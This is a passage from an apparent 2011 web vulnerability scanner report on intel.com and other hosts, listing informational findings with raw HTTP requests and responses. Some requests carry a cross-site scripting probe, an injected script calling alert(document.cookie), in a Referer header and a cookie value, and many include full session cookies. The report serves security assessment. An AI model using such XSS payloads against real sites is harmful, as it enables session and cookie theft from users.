Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36568

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Reference Room: Intel Business Success Stories</title>
...[SNIP]...

23.40. http://www.intel.com/sites/sitewide/survey/pix/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /sites/sitewide/survey/pix/

Request

GET /sites/sitewide/survey/pix/ HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 404 Not Found
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Expires: Sat, 05 Feb 2011 23:17:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:17:54 GMT
Content-Length: 18367
Connection: close
Set-Cookie: ASPSESSIONIDCSQQQQAT=FFJMGNPAIJEEEOOJKAPKMMCC; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
   
<!-- IMPORTANT NOTE TO WEB AUTHORS UPDATING THIS PAGE: Do NOT use .inc files for the header a
...[SNIP]...

23.41. http://www.intel.com/sitewide/pix/backgrounds/mini-promo1-text-tp.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /sitewide/pix/backgrounds/mini-promo1-text-tp.gif

Request

GET /sitewide/pix/backgrounds/mini-promo1-text-tp.gif HTTP/1.1
Host: www.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/p/en_US/support?iid=hdr+support
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; s_cc=true; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A; s_lv=1296957106490; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3Aitcenter%3Aen_us%3Alibrary; s_sq=intelcorp%2Cintelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA%26intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D

Response

HTTP/1.1 404 Not Found
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: Sun, 06 Feb 2011 01:55:20 GMT
Date: Sun, 06 Feb 2011 01:55:20 GMT
Connection: close
Content-Length: 18367

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
   
<!-- IMPORTANT NOTE TO WEB AUTHORS UPDATING THIS PAGE: Do NOT use .inc files for the header a
...[SNIP]...

23.42. http://www.intel.com/technology/architecture-silicon/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /technology/architecture-silicon/index.htm

Request

GET /technology/architecture-silicon/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:30 GMT
Content-Length: 28153
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Architecture &amp; Silicon Technology from Intel</titl
...[SNIP]...

23.43. http://www.intel.com/technology/manufacturing/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /technology/manufacturing/index.htm

Request

GET /technology/manufacturing/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:32 GMT
Content-Length: 29517
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Intel Manufacturing</title>
<!-- DOC-FACTORY Gene
...[SNIP]...

23.44. http://www.intel.com/technology/product/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /technology/product/index.htm

Request

GET /technology/product/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:31 GMT
Content-Length: 31194
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Intel Product Technologies</title>
<!-- DOC-FACTO
...[SNIP]...

23.45. http://www.intel.com/technology/turboboost/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /technology/turboboost/index.htm

Request

GET /technology/turboboost/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:35 GMT
Content-Length: 29505
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Intel&reg; Turbo Boost Technology 2.0</title>
   <meta
...[SNIP]...

23.46. http://www.intel.com/xmlns/lop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /xmlns/lop

Request

GET /xmlns/lop HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 404 Not Found
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Expires: Sat, 05 Feb 2011 23:21:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:01 GMT
Content-Length: 18367
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
   
<!-- IMPORTANT NOTE TO WEB AUTHORS UPDATING THIS PAGE: Do NOT use .inc files for the header a
...[SNIP]...

23.47. http://www.json.org/js.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.json.org
Path:   /js.html

Request

GET /js.html HTTP/1.1
Host: www.json.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:21:16 GMT
Server: Apache
Last-Modified: Thu, 18 Nov 2010 18:57:56 GMT
ETag: "b3-19a4-4ce57734"
Accept-Ranges: bytes
Content-Length: 6564
Connection: close
Content-Type: text/html

<html>
<head>
<title>JSON in JavaScript</title>
<style>
pre {font-family: "Courier New", Courier, mono; margin-left: 40pt}
</style>
</head>
<body bgcolor=linen>
<table width="100%" border="0">
<tr>

...[SNIP]...

23.48. http://www.mobileworldcongress.com/
 previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mobileworldcongress.com
Path:   /<BR/

Request

GET /<BR/ HTTP/1.1
Host: www.mobileworldcongress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:21:27 GMT
Connection: close
Content-Length: 34

<h1>Bad Request (Invalid URL)</h1>

23.49. http://www.youtube.com/ep.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /ep.swf

Request

GET /ep.swf HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 23:32:33 GMT
Server: Apache
Last-Modified: Thu, 02 Sep 2010 03:12:26 GMT
ETag: "201-48f3e2efe3a80"
Accept-Ranges: bytes
Content-Length: 513
Vary: Accept-Encoding
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<!-- Pad to 512 bytes. IE will not recognize this page otherwise. -->
<!-
...[SNIP]...

24. Content type incorrectly stated  previous  next
There are 23 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


24.1. http://6418dc.r.axf8.net/mr/a.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://6418dc.r.axf8.net
Path:   /mr/a.gif

Issue detail

The response contains the following Content-type statement:
  • Content-Type: application/x-javascript; charset=utf-8
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /mr/a.gif?a=6418DC&v=1 HTTP/1.1
Host: 6418dc.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://itcenter.intel.com/ResourceLibrary?4b801'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7e58a74ceab=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 68
Content-Type: application/x-javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 06 Feb 2011 01:55:15 GMT

gomez.b2(292332563858438,1);gomez.b1(0.5,0);if(gomez.n0)gomez.n0(1);

24.2. http://ad.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.com
Path:   /

Issue detail

